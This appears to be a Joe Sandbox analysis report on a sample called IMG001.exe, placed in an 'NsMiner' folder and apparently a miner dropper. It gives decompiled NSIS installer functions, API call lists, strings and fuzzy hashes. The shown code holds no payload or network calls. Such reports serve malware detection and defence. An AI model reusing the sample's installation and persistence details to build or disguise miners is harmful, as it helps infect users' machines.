0x00000000
0x00000000
0x00405ad0
0x00405ad4
0x00000000
0x00405ad6
0x00405ad6
0x00000000
0x00405ad6
0x00405ad4
0x00405c39
0x00405c43
0x00405c4f
0x00405c4f
0x00000000

APIs

GetVersion.KERNEL32(?,007AC488,00000000,00404DC6,007AC488,00000000), ref: 00405ABA
GetSystemDirectoryA.KERNEL32 ref: 00405B35
GetWindowsDirectoryA.KERNEL32(open C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe,00002000), ref: 00405B48
SHGetSpecialFolderLocation.SHELL32(?,0079D058), ref: 00405B84
SHGetPathFromIDListA.SHELL32(0079D058,open C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe), ref: 00405B92
CoTaskMemFree.OLE32(0079D058), ref: 00405B9D
lstrcatA.KERNEL32(open C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe,\Microsoft\Internet Explorer\Quick Launch), ref: 00405BBF
lstrlenA.KERNEL32(open C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe,?,007AC488,00000000,00404DC6,007AC488,00000000), ref: 00405C11

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 00405BB9
Software\Microsoft\Windows\CurrentVersion, xrefs: 00405B04
open C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe, xrefs: 00405A3B, 00405B02, 00405B1F, 00405B34, 00405B47, 00405B63, 00405B8E, 00405BBE, 00405BC4, 00405BDC, 00405BEF, 00405C0A, 00405C10, 00405C1B, 00405C45

Memory Dump Source

Source File: 00000000.00000002.216570589.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.216563304.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.216576027.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.216579612.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216582967.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216663345.0000000000783000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216668718.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216683010.000000000078D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216699546.000000000078F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216713433.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216719012.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216736757.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMG001.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$open C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe
API String ID: 900638850-4004765815
Opcode ID: d9708ddf32402296e38a106115687542a2b6d2f94fd80a53177eac3040c2fff3
Instruction ID: c6751bb8eccc804ec61c49aead727a37010080e613970cf4b87633533313e554
Opcode Fuzzy Hash: d9708ddf32402296e38a106115687542a2b6d2f94fd80a53177eac3040c2fff3
Instruction Fuzzy Hash: 2351D231A04A04ABEF206B249C84B7F3BB4DB55724F14423BE511BA2D1D37D6981DF5E

Uniqueness

Uniqueness Score: -1.00%

Function 00405D12, Relevance: 4.5, APIs: 3, Instructions: 20
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405D12(signed int _a4) {
				struct HINSTANCE__* _t5;
				CHAR* _t7;
				signed int _t9;

				_t9 = _a4 << 3;
				_t7 =  *(_t9 + 0x409200);
				_t5 = GetModuleHandleA(_t7);
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t9 + 0x409204));
				}
				_t5 = LoadLibraryA(_t7); // executed
				if(_t5 != 0) {
					goto L2;
				}
				return _t5;
			}

0x00405d1a
0x00405d1d
0x00405d24
0x00405d2c
0x00405d39
0x00000000
0x00405d40
0x00405d2f
0x00405d37
0x00000000
0x00000000
0x00405d48

APIs

GetModuleHandleA.KERNEL32(?,?,00000000,00403121,00000008), ref: 00405D24
LoadLibraryA.KERNELBASE(?,?,00000000,00403121,00000008), ref: 00405D2F
GetProcAddress.KERNEL32(00000000,?), ref: 00405D40

Memory Dump Source

Source File: 00000000.00000002.216570589.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.216563304.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.216576027.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.216579612.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216582967.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216663345.0000000000783000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216668718.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216683010.000000000078D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216699546.000000000078F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216713433.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216719012.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216736757.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMG001.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: 7acfb344228b968400b962badda7c36266698eee5c55508006b44164a923ef80
Instruction ID: e428d20ee9bf7b263dfbdc6b1eaa460cc0a746502d73873f4fda876fa73e4f8f
Opcode Fuzzy Hash: 7acfb344228b968400b962badda7c36266698eee5c55508006b44164a923ef80
Instruction Fuzzy Hash: 10E08C36A04510BBD3215F209E0896B73A8EEDAB40300487EF615F6251D734AC11DFBA

Uniqueness

Uniqueness Score: -1.00%

Function 00405CEB, Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405CEB(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x7bcd00); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x7bcd00;
			}

0x00405cf6
0x00405cff
0x00000000
0x00405d0c
0x00405d02
0x00000000

APIs

FindFirstFileA.KERNELBASE(?,007BCD00,007BA4B8,00405607,007BA4B8,007BA4B8,00000000,007BA4B8,007BA4B8,?,?,00000000,00405329,?,007EE000,00000000), ref: 00405CF6
FindClose.KERNEL32(00000000), ref: 00405D02

Memory Dump Source

Source File: 00000000.00000002.216570589.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.216563304.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.216576027.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.216579612.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216582967.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216663345.0000000000783000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216668718.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216683010.000000000078D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216699546.000000000078F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216713433.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216719012.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216736757.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMG001.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 1ca473d55b8aa3f231cefed5bcfc42c0dfe78d3d248200b2f8c286e45b37ad6d
Instruction ID: a9cba8e735bd77091c38ad40f287727c35eedbeaf980a92083549f84fef47ecd
Opcode Fuzzy Hash: 1ca473d55b8aa3f231cefed5bcfc42c0dfe78d3d248200b2f8c286e45b37ad6d
Instruction Fuzzy Hash: AFD0C9359195206BC20117286C0C98B6A58DF05330720DA32B025E22E0C2349C518AA9

Uniqueness

Uniqueness Score: -1.00%

Function 00403539, Relevance: 42.2, APIs: 15, Strings: 9, Instructions: 216
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00403539() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				struct HINSTANCE__* _t37;
				int _t38;
				int _t42;
				char _t62;
				CHAR* _t64;
				signed char _t68;
				CHAR* _t79;
				intOrPtr _t81;
				CHAR* _t86;

				_t81 =  *0x7c56b0;
				_t20 = E00405D12(6);
				_t88 = _t20;
				if(_t20 == 0) {
					_t79 = 0x7b04b0;
					 *0x7f6000 = 0x7830;
					E004058D7(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x7b04b0, 0);
					__eflags =  *0x7b04b0;
					if(__eflags == 0) {
						E004058D7(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x7b04b0, 0);
					}
					lstrcatA(0x7f6000, _t79);
				} else {
					E0040594E(0x7f6000,  *_t20() & 0x0000ffff);
				}
				E00403802(_t76, _t88);
				 *0x7c5720 =  *0x7c56b8 & 0x00000020;
				 *0x7c573c = 0x10000;
				if(E004055C4(_t88, 0x7f0000) != 0) {
					L16:
					if(E004055C4(_t96, 0x7f0000) == 0) {
						E00405A12(0, _t79, _t81, 0x7f0000,  *((intOrPtr*)(_t81 + 0x118)));
					}
					_t28 = LoadImageA( *0x7c56a0, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x7c1688 = _t28;
					if( *((intOrPtr*)(_t81 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t30 = E00403802(_t76, __eflags);
							__eflags =  *0x7c5740;
							if( *0x7c5740 != 0) {
								_t31 = E00404E60(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x7c166c;
								if( *0x7c166c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x7b0488, 5);
							_t37 = LoadLibraryA("RichEd20");
							__eflags = _t37;
							if(_t37 == 0) {
								LoadLibraryA("RichEd32");
							}
							_t86 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t86, 0x7c1640);
							__eflags = _t38;
							if(_t38 == 0) {
								GetClassInfoA(0, "RichEdit", 0x7c1640);
								 *0x7c1664 = _t86;
								RegisterClassA(0x7c1640);
							}
							_t42 = DialogBoxParamA( *0x7c56a0,  *0x7c1680 + 0x00000069 & 0x0000ffff, 0, E004038CF, 0);
							E00403489(E0040140B(5), 1);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t76 =  *0x7c56a0;
						 *0x7c1654 = _t28;
						_v20 = 0x624e5f;
						 *0x7c1644 = 0x401000;
						 *0x7c1650 =  *0x7c56a0;
						 *0x7c1664 =  &_v20;
						if(RegisterClassA(0x7c1640) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x7b0488 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7c56a0, 0);
						goto L21;
					}
				} else {
					_t76 =  *(_t81 + 0x48);
					if(_t76 == 0) {
						goto L16;
					}
					_t79 = 0x7bd640;
					E004058D7( *((intOrPtr*)(_t81 + 0x44)), _t76,  *((intOrPtr*)(_t81 + 0x4c)) +  *0x7c56d8, 0x7bd640, 0);
					_t62 =  *0x7bd640; // 0x6f
					if(_t62 == 0) {
						goto L16;
					}
					if(_t62 == 0x22) {
						_t79 = 0x7bd641;
						 *((char*)(E0040550E(0x7bd641, 0x22))) = 0;
					}
					_t64 = lstrlenA(_t79) + _t79 - 4;
					if(_t64 <= _t79 || lstrcmpiA(_t64, ?str?) != 0) {
						L15:
						E004059F0(0x7f0000, E004054E3(_t79));
						goto L16;
					} else {
						_t68 = GetFileAttributesA(_t79);
						if(_t68 == 0xffffffff) {
							L14:
							E0040552A(_t79);
							goto L15;
						}
						_t96 = _t68 & 0x00000010;
						if((_t68 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x0040353f
0x00403548
0x0040354f
0x00403551
0x00403565
0x00403577
0x00403581
0x00403586
0x0040358c
0x0040359f
0x0040359f
0x004035aa
0x00403553
0x0040355e
0x0040355e
0x004035af
0x004035c2
0x004035c7
0x004035d8
0x0040365f
0x00403667
0x00403670
0x00403670
0x00403686
0x0040368c
0x0040369a
0x00403729
0x00403731
0x0040373b
0x00403740
0x00403746
0x004037d0
0x004037d5
0x004037d7
0x004037f3
0x00000000
0x004037f3
0x004037d9
0x004037df
0x004037e7
0x004037e7
0x00000000
0x004037df
0x00403754
0x00403765
0x00403767
0x00403769
0x00403770
0x00403770
0x00403778
0x00403780
0x00403782
0x00403784
0x0040378d
0x00403790
0x00403796
0x00403796
0x004037b5
0x004037c6
0x00000000
0x004037cb
0x00403733
0x00403735
0x00000000
0x004036a0
0x004036a0
0x004036a6
0x004036b0
0x004036b8
0x004036c2
0x004036c8
0x004036d6
0x004037f8
0x004037f8
0x00000000
0x004037f8
0x004036dc
0x004036e5
0x00403724
0x00000000
0x00403724
0x004035de
0x004035de
0x004035e3
0x00000000
0x00000000
0x004035ed
0x004035fd
0x00403602
0x00403609
0x00000000
0x00000000
0x0040360d
0x0040360f
0x0040361c
0x0040361c
0x00403624
0x0040362a
0x00403652
0x0040365a
0x00000000
0x0040363c
0x0040363d
0x00403646
0x0040364c
0x0040364d
0x00000000
0x0040364d
0x00403648
0x0040364a
0x00000000
0x00000000
0x00000000
0x0040364a
0x0040362a

APIs

Part of subcall function 00405D12: GetModuleHandleA.KERNEL32(?,?,00000000,00403121,00000008), ref: 00405D24
Part of subcall function 00405D12: LoadLibraryA.KERNELBASE(?,?,00000000,00403121,00000008), ref: 00405D2F
Part of subcall function 00405D12: GetProcAddress.KERNEL32(00000000,?), ref: 00405D40

lstrcatA.KERNEL32(007F6000,007B04B0,80000001,Control Panel\Desktop\ResourceLocale,00000000,007B04B0,00000000,00000006,007EE000,00000000,007F8000,00000000), ref: 004035AA
lstrlenA.KERNEL32(open C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe,?,?,?,open C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe,00000000,007F0000,007F6000,007B04B0,80000001,Control Panel\Desktop\ResourceLocale,00000000,007B04B0,00000000,00000006,007EE000), ref: 0040361F
lstrcmpiA.KERNEL32(?,.exe,open C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe,?,?,?,open C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe,00000000,007F0000,007F6000,007B04B0,80000001,Control Panel\Desktop\ResourceLocale,00000000,007B04B0,00000000), ref: 00403632
GetFileAttributesA.KERNEL32(open C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe), ref: 0040363D
LoadImageA.USER32 ref: 00403686

Part of subcall function 0040594E: wsprintfA.USER32 ref: 0040595B

RegisterClassA.USER32 ref: 004036CD
SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004036E5
CreateWindowExA.USER32 ref: 0040371E
ShowWindow.USER32(00000005,00000000), ref: 00403754
LoadLibraryA.KERNEL32(RichEd20), ref: 00403765
LoadLibraryA.KERNEL32(RichEd32), ref: 00403770
GetClassInfoA.USER32 ref: 00403780
GetClassInfoA.USER32 ref: 0040378D
RegisterClassA.USER32 ref: 00403796
DialogBoxParamA.USER32 ref: 004037B5

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 0040356D
.DEFAULT\Control Panel\International, xrefs: 00403595
_Nb, xrefs: 004036DC, 004036E1
RichEdit20A, xrefs: 00403778, 0040377E
open C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe, xrefs: 004035ED, 004035F5, 00403602, 0040364C, 00403652
RichEd32, xrefs: 0040376B
RichEdit, xrefs: 00403787
RichEd20, xrefs: 00403760
.exe, xrefs: 0040362C

Memory Dump Source

Source File: 00000000.00000002.216570589.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.216563304.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.216576027.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.216579612.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216582967.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216663345.0000000000783000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216668718.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216683010.000000000078D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216699546.000000000078F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216713433.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216719012.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216736757.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMG001.jbxd

Similarity

API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$open C:\Users\user\AppData\Roaming\NsMiner\IMG001.exe
API String ID: 914957316-8178422
Opcode ID: 90656930fb87bb5256545a39020ef3d9096cda405e0a7b6f2be00f50b7daa507
Instruction ID: 8c621e14f72e88bd80986ac3a21b0b3abaff23a62075e42d3877170e53afbe30
Opcode Fuzzy Hash: 90656930fb87bb5256545a39020ef3d9096cda405e0a7b6f2be00f50b7daa507
Instruction Fuzzy Hash: DC61C1B0500240BED220AF619C85F273BADEB41759F44853EF941B62E2DB7DAD408B3E

Uniqueness

Uniqueness Score: -1.00%

Function 00402C22, Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E00402C22(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _t50;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				intOrPtr* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				 *0x7c56ac = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, 0x7fc000, 0x2000);
				_t89 = E004056C7(0x7fc000, 0x80000000, 3);
				_v16 = _t89;
				 *0x409014 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				E004059F0(0x7f4000, 0x7fc000);
				E004059F0(0x7fe000, E0040552A(0x7f4000));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x7a6460 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402BBE(1);
					__eflags =  *0x7c56b4 - _t82;
					if( *0x7c56b4 == _t82) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t94 = GlobalAlloc(0x40, _v24);
						E00403093( *0x7c56b4 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff);
						_t57 = E00402E5B();
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x7c56b0 = _t94;
							 *0x7c56b8 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x7c56bc =  *0x7c56bc + 1;
								__eflags =  *0x7c56bc;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405688(0x7c56c0, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E00403093( *0x792454);
					_t65 = E00403061( &_a4, 4); // executed
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x7c56b4) & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E00403061(0x79e460, _t90); // executed
						__eflags = _t71;
						if(_t71 == 0) {
							E00402BBE(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x7c56b4;
						if( *0x7c56b4 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402BBE(0);
							}
							goto L20;
						}
						E00405688( &_v44, 0x79e460, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x792454; // 0x363211
						 *0x7c5740 =  *0x7c5740 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x7c56b4 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t24 = _t80 - 4; // 0x40915c
							_t93 = _t24;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x7a6460; // 0x363215
						if(__eflags < 0) {
							_v12 = E00405D7E(_v12, 0x79e460, _t90);
						}
						 *0x792454 =  *0x792454 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

0x00402c2a
0x00402c2d
0x00402c30
0x00402c4a
0x00402c4f
0x00402c62
0x00402c67
0x00402c6a
0x00402c70
0x00000000
0x00402c72
0x00402c83
0x00402c94
0x00402c9b
0x00402ca1
0x00402ca3
0x00402ca8
0x00402caa
0x00402d97
0x00402d99
0x00402d9e
0x00402da5
0x00000000
0x00000000
0x00402da7
0x00402daa
0x00402dce
0x00402dd9
0x00402de4
0x00402de9
0x00402dec
0x00402ded
0x00402dee
0x00402df0
0x00402df5
0x00402df8
0x00402e0b
0x00402e0f
0x00402e17
0x00402e1c
0x00402e1e
0x00402e1e
0x00402e1e
0x00402e26
0x00402e26
0x00402e29
0x00402e2a
0x00402e2a
0x00402e2d
0x00402e2f
0x00402e2f
0x00402e2f
0x00402e39
0x00402e3f
0x00402e4d
0x00402e52
0x00000000
0x00402e52
0x00000000
0x00402df8
0x00402db2
0x00402dbd
0x00402dc2
0x00402dc4
0x00000000
0x00000000
0x00402dc9
0x00402dcc
0x00000000
0x00000000
0x00000000
0x00402cb0
0x00402cb5
0x00402cba
0x00402cbe
0x00402cc5
0x00402cca
0x00402ccc
0x00402cce
0x00402cce
0x00402cd2
0x00402cd7
0x00402cd9
0x00402e03
0x00402dfa
0x00000000
0x00402dfa
0x00402cdf
0x00402ce6
0x00402d62
0x00402d66
0x00402d6a
0x00402d6f
0x00000000
0x00402d66
0x00402cef
0x00402cf4
0x00402cf7
0x00402cfc
0x00000000
0x00000000
0x00402cfe
0x00402d05
0x00000000
0x00000000
0x00402d07
0x00402d0e
0x00000000
0x00000000
0x00402d10
0x00402d17
0x00000000
0x00000000
0x00402d19
0x00402d20
0x00000000
0x00000000
0x00402d22
0x00402d28
0x00402d31
0x00402d37
0x00402d3a
0x00402d3c
0x00402d42
0x00000000
0x00000000
0x00402d48
0x00402d4c
0x00402d54
0x00402d54
0x00402d57
0x00402d57
0x00402d5a
0x00402d5c
0x00402d5e
0x00402d5e
0x00000000
0x00402d5c
0x00402d4e
0x00402d52
0x00000000
0x00000000
0x00000000
0x00402d70
0x00402d70
0x00402d76
0x00402d82
0x00402d82
0x00402d85
0x00402d8b
0x00402d8d
0x00402d8d
0x00402d95
0x00402d95
0x00000000
0x00402d95

APIs

GetTickCount.KERNEL32 ref: 00402C33
GetModuleFileNameA.KERNEL32(00000000,007FC000,00002000), ref: 00402C4F

Part of subcall function 004056C7: GetFileAttributesA.KERNELBASE(00000003,00402C62,007FC000,80000000,00000003), ref: 004056CB
Part of subcall function 004056C7: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004056ED

GetFileSize.KERNEL32(00000000,00000000,007FE000,00000000,007F4000,007F4000,007FC000,007FC000,80000000,00000003), ref: 00402C9B

Strings

`y, xrefs: 00402CB0
soft, xrefs: 00402D10
Error launching installer, xrefs: 00402C72
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402DFA
Null, xrefs: 00402D19
Inst, xrefs: 00402D07

Memory Dump Source

Source File: 00000000.00000002.216570589.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.216563304.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.216576027.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.216579612.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216582967.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216663345.0000000000783000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216668718.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216683010.000000000078D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216699546.000000000078F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216713433.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216719012.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.216736757.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IMG001.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$`y$soft
API String ID: 4283519449-3997830375
Opcode ID: 94711ecc45234f7ba2a079bd4e9b12e85bb003b18ca92e1f66ec071fe1a5b421
Instruction ID: 57f23f0b62e6a01369d39fff8d31ed78eb59a747729ce522ddeed5f5d9bac812
Opcode Fuzzy Hash: 94711ecc45234f7ba2a079bd4e9b12e85bb003b18ca92e1f66ec071fe1a5b421
Instruction Fuzzy Hash: 65513671900604ABDB109F64DE89F9E7BA8EF04719F50413BF901B62D1D7BC9D818B9D

Uniqueness

Uniqueness Score: -1.00%

Function 00402E5B, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 171
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00402E5B(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
				struct _OVERLAPPED* _v8;
				long _v12;
				void* _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				char _v92;
				void* _t67;
				void* _t68;
				int _t73;
				long _t74;
				intOrPtr _t78;
				long _t79;
				void* _t81;
				int _t83;
				void* _t98;
				void* _t99;
				long _t100;
				int _t101;
				long _t102;
				int _t103;
				intOrPtr _t104;
				long _t105;
				void* _t106;

				_t101 = _a16;
				_t98 = _a12;
				_v12 = _t101;
				if(_t98 == 0) {
					_v12 = 0x8000;
				}
				_v8 = 0;
				_v16 = _t98;
				if(_t98 == 0) {
					_v16 = 0x796458;
				}
				_t65 = _a4;
				if(_a4 >= 0) {
					E00403093( *0x7c56f8 + _t65);
				}
				_t67 = E00403061( &_a16, 4); // executed
				if(_t67 == 0) {
					L44:
					_push(0xfffffffd);
					goto L45;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t98 != 0) {
							if(_a16 < _t101) {
								_t101 = _a16;
							}
							if(E00403061(_t98, _t101) != 0) {
								_v8 = _t101;
								L47:
								return _v8;
